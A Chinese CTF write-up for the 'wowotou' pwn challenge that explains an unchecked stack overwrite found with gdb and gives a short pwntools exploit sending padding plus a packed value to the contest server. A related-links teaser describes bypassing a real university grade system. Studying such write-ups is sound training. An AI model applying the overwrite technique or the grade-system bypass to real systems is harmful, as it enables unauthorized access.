当前位置:首页 > DayDayUp > 正文内容

[WP] 第三届河北师范大学信息安全挑战赛 窝窝头

Luz3年前 (2019-11-03)DayDayUp1630

image.png


image.png


存在flag的直接输出


gdb调试


`I36MH~~PQ%ONXSME)GE`11.png


0x31313131为我输入的文本 

0x00000315是存储v5的地方


没有溢出检测那就直接覆盖掉 


数了数中间差了25个单位  


编写exp

from pwn import*
#p=process("/wowotou")
p=remote("183.129.189.60",10020)
p.sendline('1'*25*4+p32(4))
p.interactive()



image.png


获得flag

标签: PWN

相关文章

AWD赛后总结与反思

AWD赛后总结与反思

大概有半年多没有打过网络安全的竞赛了,最近被拉去打了国赛,当然是纯被打的角色,从前打的都是CTF,AWD的赛制、规则、注意点都与之有天壤之别。不出意料没拿到什么奖,总结了一下国赛AWD的经验,自己还是小白,所以请大佬绕道。一、赛前查的资料赛...

湖州师范学院期末考试成绩提前查询(教务系统绕过)

湖州师范学院期末考试成绩提前查询(教务系统绕过)

20220501更新教务系统已换新,新版查询方法见:https://hyluz.cn/?id=65522新版查询接口:http://cjcx.hyluz.cn/下文方法已不可用登录登录教务系统  (学校教务系统均可/default...

软件著作权申请流程(软著申请流程详解)

软件著作权申请流程(软著申请流程详解)

以前都是找第三方代办,最近发现软著不用手续费了,自己付个快递钱就能申请了,被打回来也没什么损失,记录一下流程。账号注册在中国版权保护中心注册账号官网:http://www.ccopyright.com.cn/注册页面链接:https://r...

删除Halo桌面卸载后残余的halodesktop文件夹

删除Halo桌面卸载后残余的halodesktop文件夹

现象:残留Halo桌面写在后在 C:\Program Files (x86) 残留目录HaloDesktop其中存在HaloSvc.dll文件被Desktop Arrangement Helper Service使用,导致整个文件夹无法删除...

Office镜像解压至分区根目录导致磁盘图标变成office图标

Office镜像解压至分区根目录导致磁盘图标变成office图标

现象:Office镜像解压至分区根目录导致磁盘图标变成office图标操作:删除autorun.inf...

linux 常用tcpdump 抓包命令

默认抓包(抓取网络接口1上的所有数据包)tcpdump指定网卡(eth1:网卡名)tcpdump -i eth1指定主机(name:主机名,1.1.1.1:主机ip,抓取进入/离开指定主机的包;src:发送,dst:接收...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。